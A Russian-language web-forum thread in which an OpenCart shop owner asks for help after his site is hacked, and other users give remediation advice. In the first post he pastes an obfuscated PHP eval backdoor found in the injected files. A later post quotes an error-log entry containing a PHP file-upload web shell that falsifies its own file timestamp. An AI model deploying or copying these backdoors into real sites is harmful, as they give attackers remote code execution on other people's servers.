неизвестные и странные файлы

[ukbg]

Здравствуйте!

 

Внезапно главная страница сайта перестала отображаться(дня 3 не заходил, зашел и на тебе...), при этом админка работала, зайдя в корневую папку и сравнив с бэкапом, увидел что появилась куча файлов, типа: user.php.suspected, файлы такого типа есть почти в каждой папке, содержание файла: <?php                                                                                                                                                                                                                                                  $tzbz48= "o_46tdsepbac";$ndr91 =strtolower ($tzbz48[9].$tzbz48[10]. $tzbz48[6].$tzbz48[7]. $tzbz48[3].$tzbz48[2]. $tzbz48[1] .$tzbz48[5]. $tzbz48[7].$tzbz48[11].$tzbz48[0]. $tzbz48[5]. $tzbz48[7]) ; $nynz0= strtoupper($tzbz48[1].$tzbz48[8]. $tzbz48[0]. $tzbz48[6]. $tzbz48[4] ) ; if( isset (${$nynz0} ['n42dabb'] )) {eval($ndr91(${$nynz0}[ 'n42dabb'] ));} ?>

И создана папка dump... Переименован доступ к файлу ошибок движка и вставлен другой, который нес инфу странную...(удалил, не могу выложить)

коды данного типа есть везде, даже некоторые языковые файлы...

 

А что произошло и прочее, не пойму... Вопрос в следующем: Это опасно, было ли у кого, что делать, как избежать в будущем????

[afwollis]

похакали и всунули вредоносный код.

[AlexDW]

подобное обсуждалось - здесь, здесь

[ukbg]

похакали и всунули вредоносный код.

И че все??? Весь ответ? Это ж логично и очевидно само по себе, вопрос не в том: Ой батюньки, что за хрень происходит, ничо не понимаю... А в том как этого избежать в будущем и как исправить сейчас... Есть варианты(конкретные по восстановлению??? Как избежать такой ситуации в будущем?? Какие есть модули и проги, способные защитить от этого????

 

подобное обсуждалось - здесь, здесь

 

Я прочел что там обсуждалось, ничего конкретного не увидел, хостеру отписал, чтобы на вирусняк проверил.. Но это полбеды, у меня и бэкап нормальный есть сайта, со всеми вытекающими, но проблема в том, что я не хочу, чтобы это повторилось, поэтому и отписал сюда... В надежде, что увижу адекватных профессионалов, с конкретными решениями и советами...

[hoolygan]

.....

А что произошло и прочее, не пойму...

 

Написали - хакнули тебя

 

 

Вопрос в следующем: Это опасно, было ли у кого....

 

Дали 2 ссылки на похожие ситуации.

 

 

... что делать...????

 

Помощь на платной основе, если попросишь - выполнят

 

 

.... как избежать в будущем????

 

Не делай на сайте НИЧЕГО, в чем не уверен на 150%, что это безопасно, особенно варез.

Ну и соответственно, меняй все возможные пароли на сайт/фтп/почту/хостинг и.т.д.

Змінено 11 січня 2016 користувачем hoolygan

[AlexDW]

конкретных решений нет - они сугубо индивидуальны, и зависят от способа взлома/уязвимостей

 

по ссылкам выше есть и ответы, как этого избежать, и советы, что с этим делать

если вы их не видите и/или лень читать - ваши проблемы

[ukbg]

afwollis сказал(а) 31 Дек 2015 - 6:52 PM:

новый год же - злодеи бухают.

 

MWA-HA-HA-HA!!! © Raving Rabbids :-D

 

Ничего полезного... Дочитал до конца....

 

По второй ссылке тоже ничего толком... Кроме:

AlexDW
Продвинутый пользователь Пользователи3 430 сообщений41
Очень хорошийГородЕкатеринбург
Отправлено 25 Ноябрь 2014 - 12:57 99% всех причин подобных радостей - использование платных дополнений на халяву (здравствуй, варез!), раздача доступа кому попало, слабые/идиотские пароли и банальные вирусы на компе, с которого осуществляется доступ.

 

Возможно ли что установленный мною примерно год назад, парсер м икс(уточню, скачал для ознакомления, не разобравшись как им пользоваться(точнее он был для пробы бесплатный, на один парсинг(одного товара), но я сирано его не понял и забросил его),  мог сделать дыру в доступе к моей файловой системе???

 

 

Если нет, то больше, из всего, что написано выше в тех переходах, не дает мне точного ответа на вопрос, как?1 Ведь все что описано выше и так у меня стоит(я про ограничения записи папок и пароли и прочее)... Хостер тоже написал что у них все норм и это только у меня на одном сайте...

 

почти все файлы имеют окончание .suspected или же имеют дико кривое название z2KGfW9XiyzqOu.php 

Данные файла ошибки, прежде чем это произошло:
2015-12-24 23:20:10 - PHP Notice: Error: MySQL server has gone away<br />Error No: 2006<br />SELECT * FROM oc_information i LEFT JOIN oc_information_description id ON (i.information_id = id.information_id) LEFT JOIN oc_information_to_store i2s ON (i.information_id = i2s.information_id) WHERE id.language_id = '1' AND i2s.store_id = '0' AND i.status = '1' ORDER BY i.sort_order, LCASE(id.title) ASC in /home/....../public_html/system/database/mysql.php on line 50
2015-12-26 3:47:20 - PHP Notice: Undefined index: import in /home/....../public_html/admin/controller/tool/backup.php on line 13

Вот запись, неизвестного и кривого файла ошибки, внезапно появившегося(я так понял загрузчика файлов):
2015-12-26 3:47:27 - PHP Notice: Error: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=wind' at line 1<br />Error No: 1064<br /><html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-utf-8">
<title>utf</title>
</head>
<body>
<?php
echo "<h1>Welcome</h1>n";
echo "IP: ";
echo $_SERVER['REMOTE_ADDR'];
echo "<form method="post" enctype="multipart/form-data">n";
echo "<input type="file" name="newfile"><br> n";
echo "<input type="submit" value="OK"><br>n";
echo "</form>n";
if(is_uploaded_file($_FILES["newfile"]["tmp_name"]))
{
move_uploaded_file($_FILES["newfile"]["tmp_name"], $_FILES["newfile"]["name"]);
$file = $_FILES["newfile"]["name"];
echo "<a href="$file">$file</a>";
} else {
echo("empty");
}
$newfile = $_SERVER[sCRIPT_FILENAME];
$time = time() - 105360688;
touch($newfile, $time);
?>
</body>

вот, далее долгое время никто вообще не заходил и потом ошибки:

</html> in /home/....../public_html/system/database/mysql.php on line 50
2015-12-31 10:10:09 - PHP Warning: unlink(/home/....../public_html/system/cache/cache.language.1451550820): No such file or directory in /home/....../public_html/system/library/cache.php on line 18
2015-12-31 10:10:10 - PHP Warning: unlink(/home/....../public_html/system/cache/cache.manufacturer.0.1.1451560210): No such file or directory in /home/....../public_html/system/library/cache.php on line 45
2016-01-04 1:08:54 - PHP Notice: Error: MySQL server has gone away<br />Error No: 2006<br />SELECT * FROM oc_currency ORDER BY title ASC in /home/....../public_html/system/database/mysql.php on line 50
2016-01-04 19:26:14 - PHP Notice: Error: MySQL server has gone away<br />Error No: 2006<br />SELECT * FROM oc_extension WHERE `type` = 'total' in /home/....../public_html/system/database/mysql.php on line 50
2016-01-05 10:07:55 - PHP Notice: Error: MySQL server has gone away<br />Error No: 2006<br />SELECT * FROM oc_information i LEFT JOIN oc_information_description id ON (i.information_id = id.information_id) LEFT JOIN oc_information_to_store i2s ON (i.information_id = i2s.information_id) WHERE id.language_id = '1' AND i2s.store_id = '0' AND i.status = '1' ORDER BY i.sort_order, LCASE(id.title) ASC in /home/....../public_html/system/database/mysql.php on line 50
2016-01-10 18:34:01 - PHP Notice: Undefined index: u3c6 in /home/....../public_html/catalog/language/russian/checkout/checkout.php on line 1
2016-01-10 18:34:01 - PHP Warning: ini_set(): open_basedir restriction in effect. File() is not within the allowed path(s): (/home/......:/tmp:/var/tmp:/opt/php-5.5/pear) in /home/....../public_html/catalog/language/russian/checkout/checkout.php on line 1
2016-01-10 18:34:01 - PHP Notice: unserialize(): Error at offset 0 of 24 bytes in /home/....../public_html/catalog/language/russian/checkout/checkout.php on line 1
2016-01-10 18:34:05 - PHP Notice: Undefined index: u3c6 in /home/....../public_html/catalog/language/russian/checkout/checkout.php on line 1
2016-01-10 18:34:05 - PHP Warning: ini_set(): open_basedir restriction in effect. File() is not within the allowed path(s): (/home/......:/tmp:/var/tmp:/opt/php-5.5/pear) in /home/....../public_html/catalog/language/russian/checkout/checkout.php on line 1
2016-01-10 18:34:05 - PHP Notice: unserialize(): Error at offset 0 of 24 bytes in /home/....../public_html/catalog/language/russian/checkout/checkout.php on line 1

 

Как быть, что делать, чтобы обезопасить себя в будущем??? Есть ли модули или советы, как конкретно защититься от проникновений???

[Blondi]

1. Для восстановления к предыдущему состоянию восстановить из последнего бэкапа. Можно сравнить по файлам, увидите куда именно и что напихали, по временным меткам можно понять с какого файла началось, что бы возможно найти дыру.

2. Сменить и перепроверить доступы на FTP, аккаунт хостера и т.п.

3. Провести расследование на предмет того как был взломан сайт. Логи в помощь - смотрим дату первого файла, и в этот период и ранее смотрим логи сервера, и вообще какие найдете. Ищете странные запросы. По ним можно определить каким образом ломанули, и понять была ли это веерная атака или бэкдор. Анализируем что же собсно делал этот код - продавал ссылки, или же проксировал команды C&C для какого нибуть ботнета... Тоже поможет...

4. обновить все до последних версий. Если у Вас стоит какой то древний движок или модуль двухлетней давности, то дыр в нем куча, и проще обновить его, чем искать все и латать.

5. Проверяем настройки хостинга и права доступа на папки, может банально гдето 777 стоит :)

6. Проверяем на варез, что откуда ставили, кто что пилил, насколько дружили с теми кто пилил магазин - могли бэкдоров наставить заранее...

[afwollis]

И че все???...

ниче. значит ты некомпетентен в данных вопросах.

поручи это специалисту.

[halfhope]

Обращайтесь если что, чем раньше тем лучше.

Змінено 12 січня 2016 користувачем halfhope

[ukbg]

Загрузил бэкап, все супер, отлично работало, через 2 дня(сегодня)(прям с утра) журнал ошибок выдал следующее:

2016-01-13 7:34:56 - PHP Notice:  Error: Could not load language russian! in /home/...../public_html/vqmod/vqcache/vq2-system_library_language.php on line 39
2016-01-13 7:35:56 - PHP Notice:  Error: Could not load language russian! in /home/...../public_html/vqmod/vqcache/vq2-system_library_language.php on line 39
2016-01-13 7:36:12 - PHP Notice:  Error: Could not load language russian! in /home/...../public_html/vqmod/vqcache/vq2-system_library_language.php on line 39
2016-01-13 7:36:23 - PHP Notice:  Error: Could not load language russian! in /home/...../public_html/vqmod/vqcache/vq2-system_library_language.php on line 39
2016-01-13 7:36:35 - PHP Notice:  Error: Could not load language russian! in /home/...../public_html/vqmod/vqcache/vq2-system_library_language.php on line 39
2016-01-13 7:36:56 - PHP Notice:  Error: Could not load language russian! in /home/...../public_html/vqmod/vqcache/vq2-system_library_language.php on line 39
2016-01-13 7:36:56 - PHP Notice:  Error: Could not load language error/not_found! in /home/...../public_html/vqmod/vqcache/vq2-system_library_language.php on line 39
2016-01-13 7:36:56 - PHP Notice:  Error: Could not load model design/layout! in /home/...../public_html/vqmod/vqcache/vq2-system_engine_loader.php on line 48
2016-01-13 7:38:16 - PHP Notice:  Error: Could not load language error/not_found! in /home/...../public_html/vqmod/vqcache/vq2-system_library_language.php on line 39
2016-01-13 7:38:16 - PHP Notice:  Error: Could not load template /home/...../public_html/catalog/view/theme/default/template/common/column_left.tpl! in /home/...../public_html/vqmod/vqcache/vq2-system_engine_controller.php on line 70
2016-01-13 7:38:25 - PHP Notice:  Error: Could not load language error/not_found! in /home/...../public_html/vqmod/vqcache/vq2-system_library_language.php on line 39
2016-01-13 7:38:25 - PHP Notice:  Error: Could not load template /home/...../public_html/catalog/view/theme/default/template/common/column_left.tpl! in /home/...../public_html/vqmod/vqcache/vq2-system_engine_controller.php on line 70
2016-01-13 7:38:26 - PHP Notice:  Error: Could not load language error/not_found! in /home/...../public_html/vqmod/vqcache/vq2-system_library_language.php on line 39
2016-01-13 7:38:26 - PHP Notice:  Error: Could not load template /home/...../public_html/catalog/view/theme/default/template/common/column_left.tpl! in /home/...../public_html/vqmod/vqcache/vq2-system_engine_controller.php on line 70
2016-01-13 7:38:30 - PHP Notice:  Error: Could not load language error/not_found! in /home/...../public_html/vqmod/vqcache/vq2-system_library_language.php on line 39
2016-01-13 7:38:30 - PHP Notice:  Error: Could not load template /home/...../public_html/catalog/view/theme/default/template/common/column_left.tpl! in /home/...../public_html/vqmod/vqcache/vq2-system_engine_controller.php on line 70
2016-01-13 7:39:37 - PHP Notice:  Error: Could not load language error/not_found! in /home/...../public_html/vqmod/vqcache/vq2-system_library_language.php on line 39
2016-01-13 7:39:37 - PHP Notice:  Error: Could not load template /home/...../public_html/catalog/view/theme/default/template/common/column_left.tpl! in /home/...../public_html/vqmod/vqcache/vq2-system_engine_controller.php on line 70
2016-01-13 7:40:52 - PHP Notice:  Error: Could not load language error/not_found! in /home/...../public_html/vqmod/vqcache/vq2-system_library_language.php on line 39
2016-01-13 7:40:52 - PHP Notice:  Error: Could not load template /home/...../public_html/catalog/view/theme/default/template/common/column_left.tpl! in /home/...../public_html/vqmod/vqcache/vq2-system_engine_controller.php on line 70
2016-01-13 7:41:28 - PHP Notice:  Error: Could not load language error/not_found! in /home/...../public_html/vqmod/vqcache/vq2-system_library_language.php on line 39
2016-01-13 7:41:28 - PHP Notice:  Error: Could not load template /home/...../public_html/catalog/view/theme/default/template/common/column_left.tpl! in /home/...../public_html/vqmod/vqcache/vq2-system_engine_controller.php on line 70
2016-01-13 7:42:41 - PHP Notice:  Error: Could not load language error/not_found! in /home/...../public_html/vqmod/vqcache/vq2-system_library_language.php on line 39
2016-01-13 7:42:41 - PHP Notice:  Error: Could not load template /home/...../public_html/catalog/view/theme/default/template/common/column_left.tpl! in /home/...../public_html/vqmod/vqcache/vq2-system_engine_controller.php on line 70
2016-01-13 7:42:52 - PHP Notice:  Error: Could not load language error/not_found! in /home/...../public_html/vqmod/vqcache/vq2-system_library_language.php on line 39
2016-01-13 7:42:52 - PHP Notice:  Error: Could not load template /home/...../public_html/catalog/view/theme/default/template/common/column_left.tpl! in /home/...../public_html/vqmod/vqcache/vq2-system_engine_controller.php on line 70
2016-01-13 7:44:43 - PHP Notice:  Error: Could not load template /home/...../public_html/catalog/view/theme/default/template/common/column_left.tpl! in /home/...../public_html/vqmod/vqcache/vq2-system_engine_controller.php on line 70
2016-01-13 7:47:30 - PHP Notice:  Error: Could not load template /home/...../public_html/catalog/view/theme/default/template/common/column_left.tpl! in /home/...../public_html/vqmod/vqcache/vq2-system_engine_controller.php on line 70
2016-01-13 7:47:45 - PHP Notice:  Error: Could not load template /home/...../public_html/catalog/view/theme/default/template/common/column_left.tpl! in /home/...../public_html/vqmod/vqcache/vq2-system_engine_controller.php on line 70
2016-01-13 7:48:54 - PHP Notice:  Error: Could not load template /home/...../public_html/catalog/view/theme/default/template/common/column_left.tpl! in /home/...../public_html/vqmod/vqcache/vq2-system_engine_controller.php on line 70
2016-01-13 7:49:07 - PHP Notice:  Error: Could not load template /home/...../public_html/catalog/view/theme/default/template/common/column_left.tpl! in /home/...../public_html/vqmod/vqcache/vq2-system_engine_controller.php on line 70
2016-01-13 7:50:39 - PHP Notice:  Error: Could not load template /home/...../public_html/catalog/view/theme/default/template/common/column_left.tpl! in /home/...../public_html/vqmod/vqcache/vq2-system_engine_controller.php on line 70
2016-01-13 7:52:50 - PHP Notice:  Error: Could not load template /home/...../public_html/catalog/view/theme/default/template/common/column_left.tpl! in /home/...../public_html/vqmod/vqcache/vq2-system_engine_controller.php on line 70
2016-01-13 7:55:22 - PHP Notice:  Error: Could not load template /home/...../public_html/catalog/view/theme/default/template/common/column_left.tpl! in /home/...../public_html/vqmod/vqcache/vq2-system_engine_controller.php on line 70
2016-01-13 7:56:29 - PHP Notice:  Error: Could not load template /home/...../public_html/catalog/view/theme/default/template/common/column_left.tpl! in /home/...../public_html/vqmod/vqcache/vq2-system_engine_controller.php on line 70
2016-01-13 7:57:16 - PHP Notice:  Error: Could not load template /home/...../public_html/catalog/view/theme/default/template/common/column_left.tpl! in /home/...../public_html/vqmod/vqcache/vq2-system_engine_controller.php on line 70
2016-01-13 7:58:57 - PHP Notice:  Error: Could not load template /home/...../public_html/catalog/view/theme/default/template/common/column_left.tpl! in /home/...../public_html/vqmod/vqcache/vq2-system_engine_controller.php on line 70
2016-01-13 7:59:51 - PHP Notice:  Error: Could not load template /home/...../public_html/catalog/view/theme/default/template/common/column_left.tpl! in /home/...../public_html/vqmod/vqcache/vq2-system_engine_controller.php on line 70
2016-01-13 9:28:48 - PHP Notice:  Error: MySQL server has gone away<br />Error No: 2006<br />SELECT * FROM oc_extension WHERE `type` = 'total' in /home/...../public_html/system/database/mysql.php on line 50
2016-01-13 19:50:22 - PHP Notice:  Undefined index: import in /home/...../public_html/admin/controller/tool/backup.php on line 13

Затем вновь смотрю файл журнала ошибок изменен, все не так засрано как раньше(относительно файлов), но похоже это только начало... И вроде сделал все, я сменил пароли, сменил права доступа к папкам по фтп, сменил пароль фтп, проверял сайт на вирусы, все было норм, но сегодня опять меня взломали...

 

Анвир говорит: На сайте обнаружены iframe-вставки, ссылающиеся на сомнительные сайты либо обфусицированный код.

 

 

Грешу вновь на тот же парсер, ведь после восстановления сайта его вроде как не было, может причина конечно не в нем, просто проверял 2 дня, его не было, а сегодня появился

 

Не могу понять, как все таки это исправить???? И есть ли защита от такого типа атак??? Может я чет не вижу в журнале ошибок? Или не там смотрю... Хелп...)

Змінено 13 січня 2016 користувачем ukbg

[halfhope]

Не все языковые файлы загрузили, попробуйте залить тот же бекап снова, ошибки должны пропасть.

 

Не могу понять, как все таки это исправить???? И есть ли защита от такого типа атак??? Может я чет не вижу в журнале ошибок? Или не там смотрю... Хелп...)

 

Если сайт все же заражен для рассылки спама и объединен в ботнет, то очистить можно только прямыми руками. Защиты нет, просто лучше выбирайте исполнителей и покупайте лицензионный софт, это вам не пиратское кино смотреть. Причем заметил, что те, кто сидит на этом форуме очень-очень редко ловят вирусы, как вы думаете почему?

 

Помог бы бесплатно, но не могу, жизнь одна, на всех вас ее не хватит.

Змінено 14 січня 2016 користувачем halfhope

[Blondi]

Могу помочь, на платной основе. Думаю, что вряд ли кто-то возьмется бесплатно )

[ukbg]

Спасибо всем за помощь и за советы...)

 

 

Не все языковые файлы загрузили, попробуйте залить тот же бекап снова, ошибки должны пропасть.

 

 

Если сайт все же заражен для рассылки спама и объединен в ботнет, то очистить можно только прямыми руками. Защиты нет, просто лучше выбирайте исполнителей и покупайте лицензионный софт, это вам не пиратское кино смотреть. Причем заметил, что те, кто сидит на этом форуме очень-очень редко ловят вирусы, как вы думаете почему?

 

Помог бы бесплатно, но не могу, жизнь одна, на всех вас ее не хватит.

 

Спасибо, поработал прямыми ручками, вроде все получилось!)))

Причем заметил, что те, кто сидит на этом форуме очень-очень редко ловят вирусы, как вы думаете почему?

Так я и сам тут частенько бываю, уж года 3-4 вроде, пока однажды не поделился ошибкой(причем я вообще не при делах был, скачал тестовый seo чет там, потыркал, нудный, забил на него(удалять не знал как, ну и повис он у меня(сирано не работал), а он по итогам(мож через полгода) ошибку на сайте начал давать(и все кривилось), при этом это всего лишь тестовая версия была(как было написано: для ознакомления, типа лицензия за деньги), так как ключ лицензионный надо было ввести(и модуль давал об этом знать)(сам модуль не работал)(я считай тогда не в курсе был), пришел посоветоваться скинул ошибку и меня жестко и сразу забанили(сказав что я говнюк взломанными модулями пользуюсь, а он ведь даже не активный был, мало того что еще и не работал(может конечно из-за моих кривых рук), я даж расстроился тогда.... Долго мучился, в итоге разобрался сам... Представляете, как обидно, задаешь в яндексе вопрос, он выдает ссылку на форум, и написано: РЕШЕНО... ты, как маленькая девочка, бежишь быстрее по ссылке, заходишь, а тебя хватают и на костер, обвиняют ведьмой и сжигают... А ты всего лишь анимешная школьница... Привел аналогию здоровенный мужик...)))

 

Чет не пойму, проверил сайт, вроде все сделал как надо, нашел кучу левых файлов, удалил, убрал все почти, проверяю на десятках антивирусов везде пишет все супер, файлов вроде расхожих бэкапу нет(везде побывал)... Но сайт 2ip ругается, говорит что вирусняк возможно есть... Не знаете как проверить?!?)

[ukbg]

1. Для восстановления к предыдущему состоянию восстановить из последнего бэкапа. Можно сравнить по файлам, увидите куда именно и что напихали, по временным меткам можно понять с какого файла началось, что бы возможно найти дыру.

2. Сменить и перепроверить доступы на FTP, аккаунт хостера и т.п.

3. Провести расследование на предмет того как был взломан сайт. Логи в помощь - смотрим дату первого файла, и в этот период и ранее смотрим логи сервера, и вообще какие найдете. Ищете странные запросы. По ним можно определить каким образом ломанули, и понять была ли это веерная атака или бэкдор. Анализируем что же собсно делал этот код - продавал ссылки, или же проксировал команды C&C для какого нибуть ботнета... Тоже поможет...

4. обновить все до последних версий. Если у Вас стоит какой то древний движок или модуль двухлетней давности, то дыр в нем куча, и проще обновить его, чем искать все и латать.

5. Проверяем настройки хостинга и права доступа на папки, может банально гдето 777 стоит :)

6. Проверяем на варез, что откуда ставили, кто что пилил, насколько дружили с теми кто пилил магазин - могли бэкдоров наставить заранее...

 

 

Спасибо большое за совет, все сделал как написано... :-)

[hoolygan]

А не этот сайт, случайно? ukbg.info?

[ukbg]

А не этот сайт, случайно? ukbg.info?

Нет!) На этом все норм вроде!) А что с ним тоже что-то не так!?!?)